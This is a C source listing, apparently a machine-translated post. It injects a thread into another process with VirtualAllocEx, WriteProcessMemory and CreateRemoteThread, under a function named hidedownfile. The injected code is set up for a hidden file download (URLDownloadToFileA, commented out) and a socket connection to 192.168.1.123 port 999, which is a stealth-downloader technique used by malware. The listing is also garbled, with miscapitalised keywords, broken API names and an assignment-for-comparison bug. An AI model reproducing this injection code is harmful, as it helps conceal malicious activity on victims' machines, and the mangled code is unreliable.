Implement the wsastartup Function

# Include <windows. h>
# Include <Winsock. h>
# Define maxinjectsize (2048*7)

Struct tagdowninfo
{
Wsadata v_wsadata;
Socket v_sock;
Struct sockaddr_in v_target;
Tchar v_buf [256];
Tchar v_sendbuf [256];
Int v_rcvid;
Word v_versionrequeste;
Tchar v_ws2_32_lib [20];
Tchar szwsastartup [500];
/* Define the sock function */
Int v_wsastartup;
Socket v_socket;
Int v_connect;

Tchar szgetlasterror [20];

 

Tchar szurl [500];
Tchar szfile [500];
Tchar szurlmon [30];
Tchar szurldowndtofile [30];
Tchar szmessagebox [500];
Tchar szuser32_lib [30];
Bool bisrun;
DWORD dwrunmode;
Farproc funfungetmodulehandleaddr;
Farproc funfungetprocaddressaddr;
Farproc funfunloadlibraryaddr;
Farproc funfungetlasterroraddr;

};

Bool hidedownfile (tagdowninfo * pinfo, DWORD dwprocessid );

DWORD winapi threaddown (lpvoid lparam)
{

Tagdowninfo * pinfo = (tagdowninfo *) lparam;
//************************************** *****
// Define the socket function prototype
Typedef int (_ stdcall * t_wsastartup) (word, lpwsadata );

//************************************** *****
Typedef long (_ stdcall * t_messagebox) (hwnd, lpctstr, lpctstr, DWORD );
Typedef long (_ stdcall * t_urldownloadtofile) (lpvoid, lpctstr, lpctstr, DWORD, lpvoid );
Typedef hmodule (_ stdcall * t_getlasterror) (void );
Typedef hmodule (_ stdcall * t_getprocaddress) (hmodule, lpcstr );
Typedef hmodule (_ stdcall * t_getmodulehandle) (lpctstr );
Typedef hmodule (_ stdcall * t_loadlibrary) (lpctstr );
Typedef void (_ stdcall * psleep) (DWORD dwmilliseconds );

// Four important function addresses
T_getmodulehandle pgetmodulehandle = (t_getmodulehandle) pinfo-> funfungetmodulehandleaddr;
T_getprocaddress pgetprocaddress = (t_getprocaddress) pinfo-> funfungetprocaddressaddr;
T_loadlibrary ploadlibrary = (t_loadlibrary) pinfo-> funfunloadlibraryaddr;
T_getlasterror pgetlasterror = (t_getlasterror) pinfo-> funfungetlasterroraddr;

 

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
// Get the MessageBox address
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
Hmodule huser32dll = ploadlibrary (pinfo-> szuser32_lib );
If (! Huser32dll)
{
// T_messagebox pmessagebox = (t_messagebox) pgetprocaddress (huser32dll, pinfo-> szmessagebox );
// Pmessagebox (null, pinfo-> szmessagebox, pinfo-> szfile, 0 );
Return 0;
}
T_messagebox pmessagebox = (t_messagebox) pgetprocaddress (huser32dll, pinfo-> szmessagebox );

// Pmessagebox (null, pinfo-> szurl, pinfo-> szfile, 0 );

// Judge whether the program is correctly executed
// Hmodule hdll = ploadlibrary (pinfo-> szurlmon );

// T_urldownloadtofile purldownloadtofile = (t_urldownloadtofile) pgetprocaddress (hdll, pinfo-> szurldowndtofile );
// Purldownloadtofile (null, pinfo-> szurl, pinfo-> szfile, 0, null );
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////

//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////
// Obtain the wsastartup address
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////

Hmodule socklib = ploadlibrary (pinfo-> v_ws2_32_lib );
If (! Socklib)
{
Pmessagebox (null, pinfo-> szfile, pinfo-> szfile, 0 );
Return 0;
}
T_wsastartup pwsastartup = (t_wsastartup) pgetprocaddress (socklib, pinfo-> szwsastartup );
If (! Pwsastartup)
{
Pmessagebox (null, pinfo-> szurl, pinfo-> szfile, 0 );
Return 0;
}

Pwsastartup (pinfo-> v_versionrequeste, & pinfo-> v_wsadata );
//////////////////////////////////////// //////////////////////////////////////// ////////////////////////////////

 

Return 0;
}

Bool hidedownfile (tagdowninfo * pinfo, DWORD dwprocessid)
{
Handle hprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write, false, dwprocessid );
If (hprocess = NULL)
Return false;

Hinstance hlibdll = getmodulehandle ("kernel32.dll ");

Pinfo-> funfungetprocaddressaddr = (farproc) getprocaddress (hlibdll, "getprocaddress ");
Pinfo-> funfungetmodulehandleaddr = (farproc) getprocaddress (hlibdll, "getmodulehandlea ");
Pinfo-> funfunloadlibraryaddr = (farproc) getprocaddress (hlibdll, "loadlibrarya ");
Pinfo-> funfungetlasterroraddr = (farproc) getprocaddress (hlibdll, "getlasterror ");
Lstrcpy (pinfo-> szurlmon, "urlmon. dll ");
Lstrcpy (pinfo-> szurldowndtofile, "urldownloadtofilea ");
Lstrcpy (pinfo-> szmessagebox, "messageboxa ");
Lstrcpy (pinfo-> szuser32_lib, "user32.dll ");
//************************************** ******************//
Lstrcpy (pinfo-> v_ws2_32_lib, "ws2_32.dll ");
Lstrcpy (pinfo-> szwsastartup, "wsastartup ");
Pinfo-> v_versionrequeste = makeword (2, 2 );
// Prepare the parameters before the socket //
Pinfo-> v_target.sin_family = af_inet;
Pinfo-> v_target.sin_port = htons (999 );
Pinfo-> v_target.sin_addr.s_addr = inet_addr ("192.168.1.123 ");
// Prepare the parameters before the socket. Over //
//************************************** ******************//
// Allocate space
Void * premotethread = virtualallocex (hprocess, 0, maxinjectsize, mem_commit, page_execute_readwrite );
If (! Premotethread)
Return false;
Tagdowninfo * pdata = (tagdowninfo *) virtualallocex (hprocess, 0, sizeof (tagdowninfo), mem_commit, page_execute_readwrite );
If (! Pdata)
Return false;

If (! Writeprocessmemory (hprocess, premotethread, & threaddown, maxinjectsize, 0 ))
Return false;

If (! Writeprocessmemory (hprocess, pdata, pinfo, sizeof (tagdowninfo), 0 ))
Return false;

Bool Bret = true;
Handle hthread = createremotethread (hprocess, null, 0, (lpthread_start_routine) premotethread, pdata, 0, null );
If (! Hthread)
Bret = false;

Waitforsingleobject (hthread, infinite );
Virtualfreeex (hprocess, premotethread, maxinjectsize, mem_release );
Virtualfreeex (hprocess, pdata, sizeof (tagdowninfo), mem_release );
// Add the code for running the program on your own to run the program in other threads, that is, load shell32.dll more.
Closehandle (hthread );
Closehandle (hprocess );

Return Bret;
}